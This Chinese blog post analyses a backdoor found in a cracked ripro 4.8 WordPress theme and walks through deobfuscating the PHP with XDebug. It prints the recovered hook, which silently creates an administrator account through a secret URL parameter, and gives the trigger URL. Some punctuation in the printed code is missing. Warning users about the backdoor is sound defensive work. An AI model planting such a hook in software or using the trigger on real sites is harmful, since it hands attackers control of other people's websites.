关于最近网传的日主题ripro4.8版本破解版的后门问题,源码分享源头不清楚,盾给网也是转载免费分享,没想到中了套路。所有在网络上(无论是盾给源码下载网或是其他网站)下载到ripro4.8源码的朋友请好好阅读此文章:

下载后用D盾扫描

发现有加密文件,用Notepad++查看

破解混淆加密后得到源文件

经查看发现后门代码

01

02

03

04

05

06

07

08

09

10

11

12

add_action('wp_head''wp_backdoor');

function wp_backdoor()

{

        if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {

                require('wp-includes/registration.php');

                if (!username_exists('backdoor')) { //检测是否存在backdoor账户

                        $user_id = wp_create_user('backdoor''123456'); //创建账户

                        $user new WP_User($user_id);

                        $user->set_role('administrator'); //设置为管理员权限

                }

        }

}

使用http(s)://你的域名/?backdoor=go访问,
自动创建用户名为backdoor密码为123456的管理员账户
本地测试


成功登录后台


推荐这种涉及到支付的主题还是用正版,盗版的就如作者所说,很容易被添加后门。
毕竟没有真正免费的午餐。

看到有人想要学习解密php混淆加密
使用工具:PHP7.2+XDebug+VSCode{必备插件[PHP Debug(XDebug调试)+PHP IntelliSense(代码格式化)+Code Runner(快速运行php文件,方便调试)}
当然还有其他配置比如:XDebug安装,Code Runner php文件路径配置等,还是等下一次再出个php调试环境详细配置教程吧。
原文件用VSCode打开是这样的

先格式化(右键-格式化文档,多格式化几次)

保存,改编码为Western (Windows 1252)【本次解密非必须】

使用 Ctrl + Shift + P 打开快捷指令,输入 encoding,选择用 Change File Encoding,选择 Reopen with Encoding,选择 Western (Windows 1252)。

Windows 1252 是个单字节的字节集,不会出现任何 2 个字节被显示成 1 个字符的问题,其他的单字节集通常也可以。 ——@Ganlv

创建PHP调试launch.json文件

默认配置就可以了,开始调试

运行PHP文件

单步调试(F11)

一直调试可以看见不停的给变量赋值解密函数

多运行几步就会发现源码直接出来了

比起Ganlv大神解密的zym/phpjm混淆解密还简单,毕竟没有反调试。
很适合新手入门破解,欢迎交流学习。

解密后的文件

蓝奏盘:https://www.lanzous.com/i836ukh

后门代码已注释,位于412-423行

原文地址:http://www.dungei.net/8976.html

网传分享的Wordpressripro主题4.8版本后门分析_盾给网下载修复文件[建站教程]相关推荐

  1. WordPress 建站教程新手入门六主题使用 营销值得学

    作者:营销值得学 WordPress较受欢迎的原因就是拥有众多的主题模板,包含有常见的博客主题/ 淘宝客主题/企业主题/CMS主题/图片主题/视频主题等等,单是 营销值得学 免费分享的WordPres ...

  2. python爬虫网易云音乐评论再分析_爬取网易云音乐的评论后,竟有这种发现!

    原标题:爬取网易云音乐的评论后,竟有这种发现! 作者 | 志颖 责编 | 胡巍巍 用过网易云音乐听歌的朋友都知道,网易云音乐每首歌曲后面都有很多评论,热门歌曲的评论更是接近百万或者是超过百万条. 现在 ...

  3. python flask 大文件 下载_python flask 建站之文件上传下载(一)

    公众号: 数据乐趣 如有建议和问题,敬请留言. 上一篇简单讲了一下Flask建站的大概流程,本篇举个Flask实例进行说明. 建站简介 实例功能是实现文件的上传和下载. 开发软件采用Pycharm,p ...

  4. 速卖通装修html自定义代码,Shopify基础建站教程,独立站装修主题代码设置

    Shopify作为建站工具,它确实能够让我们非常便捷的建立网站并实现网站的各种功能.但是这样的便捷也牺牲了一定的可自定义的空间.通俗的说,Shopify把各个功能都模块化了,对于一些高级用户来说,如果 ...

  5. php怎样上传视频教程,phpcms怎样上传视频_CMS体系建站教程

    phpcms怎样上传视频? phpcms-v9上传视频文件时的解决方案 1.不发起直接在背景上传视频文件,由于视频文件平常都比较大,直接上传影响带宽:可先经由过程ftp东西将视频文件上传到指定目次,然 ...

  6. zblog php建站教程_Z-BlogPHP主题制作教程

    很早就想写这个教程了,不过由于时间的问题,被一值耽搁了. 其实我在刚接触zblog的时候,在网上搜索过主题的制作教程,结果很不理想,没找到一个详细的教程:自己也是一边摸索一边做,后来虽然做出了一个主题 ...

  7. python爬取裁判文书并分析_裁判文书网爬虫攻克

    最近因为公司需要爬取裁判文书网的某一类别文章数据,于是简单研究了一下,发现网站数据全是js加载的,于是想都没想直接用selenium尝试爬取,没想到竟然有selenium都抓取不到的js(刚毕业的py ...

  8. 【建站教程】万网域名使用万网\QQ企业邮箱,设置解析方法

    简介: 简单介绍一下,如何使我们的邮箱使用我们自己的域名,看起来更高大尚:如 admin@52it.club 这类的邮箱是怎么配置的呢? 一.万网企业邮箱配置如下: 当您购买了万网云邮箱产品之后,除了 ...

  9. zblog php建站教程_zblogphp视频站主题使用详细教程

    天兴工作室:zblogphp视频站主题(可发布电影.电视剧.娱乐新闻等)已经上架,由于這个主题专门针对视频站的,所以专门写了本文来详细介绍下使用此主题的方法. 主题自带seo功能:标题关键词描述的用法 ...

最新文章

  1. 黑苹果闪屏解决方法_脖子黑可以用什么方法解决,专家讲解
  2. 学python有必要买书吗-终于明白python需要学什么
  3. 机器学习和深度学习的区别 深度学习的完全取代机器学习吗
  4. ios不响应presentModalViewController界面的处理
  5. 6 Git 分支 - 变基
  6. 第九篇 并发(进程和线程)
  7. rpm安装mysql
  8. 全国省份、城市、地区全数据(SQL版与XML版)包括各城市邮编
  9. 第三十八篇、给UITabBar按钮的动画效果
  10. 霍夫线变换,霍夫圆变换
  11. android gps信号一直获取不到_抵押车的GPS到底能不能拆干净!
  12. 谷歌翻译失败解决方案
  13. Linux 杀毒软件ClamAV离线安装部署
  14. matlab--找两条曲线交点并标注于图上的方法
  15. 浅谈sketch插件二
  16. Unity3d优化总结2
  17. ajax回调函数有时成功有时失败,$.ajax数据传输成功却执行失败的回调函数
  18. 四轴平面机器人的手眼标定
  19. mac安装软件允许任何来源(sudo spctl --master-disable)
  20. 原始值(primitive value)

热门文章

  1. 如何配置magento免运费商品方法
  2. 判定给定的字符序列是否为回文【数据结构】【栈】
  3. aosp编译环境搭建
  4. 运用ArcGIS进行影像分类
  5. 帝国cms后台登录显示Table 'empirecms.***_enewsloginfail' doesn't exist
  6. 在线XXEncode加密/解密(XXEncode编码/解码)工具
  7. 人工智能本来是个很简单的事,咋被人们整的这么神秘?
  8. wpl计算方法_【数据结构】树的应用-计算哈夫曼树的WPL值
  9. 博士申请 | 香港中文大学(深圳)吴保元教授招收人工智能全奖博士/博后/RA
  10. C#的timer控件简介